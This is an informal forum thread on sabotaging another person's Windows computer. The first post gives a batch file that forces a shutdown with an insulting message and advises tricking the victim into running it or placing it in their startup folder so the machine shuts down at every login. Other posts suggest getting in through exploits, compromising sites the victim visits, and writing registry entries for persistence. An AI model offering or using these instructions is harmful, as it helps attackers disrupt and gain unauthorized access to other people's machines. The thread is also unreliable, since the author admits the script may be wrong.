if they have windows (ill assume so), open notepad, write:

@echo off
shutdown /s /c "Haha, You're fucked"

save that as whatever.bat (make sure to select any file as the file type), and upload it to the person's computer and convince them to run it/run it if you have that kinda control.....

or you could alternately put it in the startup folder of a user, and every time they log in, it will shut down....

of course, first you have to find a way in.....

(that batch file may not be right, i dont feel like looking it up)....

Having someone's ip gets you nowhere, unless you have a way in. They can have 500 ports open but if you don't know what the ports are for what are you going to do, just say they have a Trojan running on port 1234, then you going to have to find the client to connect to that, then it could be password protected.Telnet just say they have telnet running, then you need an account to login. Exploits thats your best chance, that gives you the option of running remote code on there box. but then you need to know what your doing there. If you really want to learn how to do something like this search google for exploits about IExplore.

My Style

I agree. An I.P. alone will gewt you nowhere. Although, I prefer to do around the loop hacking. I If I am hacking someonbe that I know, which is usually the option in my case, I know their internet histpry to see their top site. I exploit access that server, then use an exploit like was mentioned above. Aftrer that, I sit and wait for the opening. Like sniping, sort of. Then I just drop something in the open line. I found someone who tried to pull this trick on me once...he left my system with a melted security system and 69 Trojans that he dumped into my system earlier.

Why not just code a script in C++ that a.) creates another smaller program to handle the actual meanness (in this case shutting the computer down) and b.) that writes to the windows Registry where the new program is and when to run it (in this case on startup).

Writing to the registry really isn't hard, you ... can even do it in Batch i believe (ugh).

yea, doing it with a batch would be the easiest way, and also, as he has to ask this question, i highly doubt he knows anything about C++
